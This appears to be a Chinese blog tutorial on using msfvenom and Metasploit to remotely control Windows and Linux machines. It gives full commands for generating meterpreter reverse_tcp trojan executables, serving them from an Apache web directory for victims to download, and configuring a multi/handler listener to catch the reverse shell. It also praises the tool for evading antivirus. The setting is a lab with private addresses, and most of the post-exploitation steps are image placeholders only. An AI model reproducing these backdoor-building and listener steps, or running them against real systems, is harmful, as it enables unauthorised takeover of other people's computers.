使用msfvenom远程控制

msfvenom是什么?

msfvenom是msfpayload,msfencode集成的一个免费的、可下载的框架工具。通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。它的优点是一个单一的工具、标准化的命令行选项、效率高,其免杀效果也不错。主要用于生成后门和软件捆绑后门,利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。

使用msfvenom生成被控端

1.对windows系统的远程控制

1.1生成被控端并在靶机运行

①生成被控端

方法一:
⑴将被控端payload.exe生成到/var/payload.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx lport=5000 -f exe -o /var/pavload.exe

在这里插入图片描述

⑵再被控端改名为winpayload.exe复制到网站的目录(/var/www/html/)

cp /var/payload.exe /var/www/html/winpayload.exe

ls 查看指定目录下的所有文件
在这里插入图片描述

方法二:
将被控端winpayload.exe生成到网站的目录(/var/www/html/)下

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.163.130 lport=5000 -f exe -o /var/www/html/winpayload.exe 

在这里插入图片描述

②启动apache2服务

启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
在这里插入图片描述

③到靶机WinXPenSP3中下载并运行

在这里插入图片描述

1.2启动主控端

①启动metasploit

在这里插入图片描述

②使用模块,配置参数

⑴进入handler模块
use exploit/multi/handler
在这里插入图片描述

⑵设置攻击载荷
set payload windows/meterpreter/reverse_tcp
在这里插入图片描述

⑶设置lhost为kali的IP
set lhost 192.168.xxx.xxx
在这里插入图片描述

⑷设置lpost
set lport 5000
在这里插入图片描述

⑸发起攻击,建立会话
在这里插入图片描述

1.3控制靶机

通过shell,执行命令
在这里插入图片描述

⑴查看操作系统信息
在这里插入图片描述

⑵查看目标靶机有哪些磁盘
在这里插入图片描述

⑶延时关闭系统并弹出提示框
在这里插入图片描述
在这里插入图片描述

⑷退出控制
在这里插入图片描述

2.对linux系统的远程控制

2.1生成被控端并在靶机中下载

①生成被控端

将被控端linuxpayload.elf生成到网站的目录(/var/www/html/)下

msfvenom -p linux/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx lport=5001 -f elf -o /var/www/html/linuxpayload.exe 

在这里插入图片描述

②启动apache2服务

启动apache2服务:systemctl start apache2.service
检查apache2服务是否启动:systemctl status apache2.service
在这里插入图片描述

③到靶机WinXPenSP3中下载

⑴下载被控端
在这里插入图片描述

⑵添加执行权限
在这里插入图片描述

2.2启动主控端

①启动metasploit

在这里插入图片描述

②使用模块,配置参数

⑴进入handler模块
use exploit/multi/handler
在这里插入图片描述

⑵设置攻击载荷
set payload linux/x86/meterpreter/reverse_tcp
在这里插入图片描述

⑶设置lhost为kali的IP
set lhost 192.168.xxx.xxx
在这里插入图片描述

⑷设置lpost
set lport 5001
在这里插入图片描述

⑸发起攻击,运行被控端
在这里插入图片描述
在这里插入图片描述

2.3控制靶机

通过shell,执行命令
⑴查看操作系统信息
在这里插入图片描述

⑵查看主机名
在这里插入图片描述

⑶使用curl命令访问kali的网页
在这里插入图片描述

⑷退出控制
在这里插入图片描述

拓展

1、查看帮助信息
在这里插入图片描述

2、查看所有可以使用的攻击模块
在这里插入图片描述

3、筛选出的模块
这里以reverse_tcp模块为例
在这里插入图片描述

4、查看攻击载荷需要设置的参数
在这里插入图片描述

  • 1
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

墨染秋瑟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值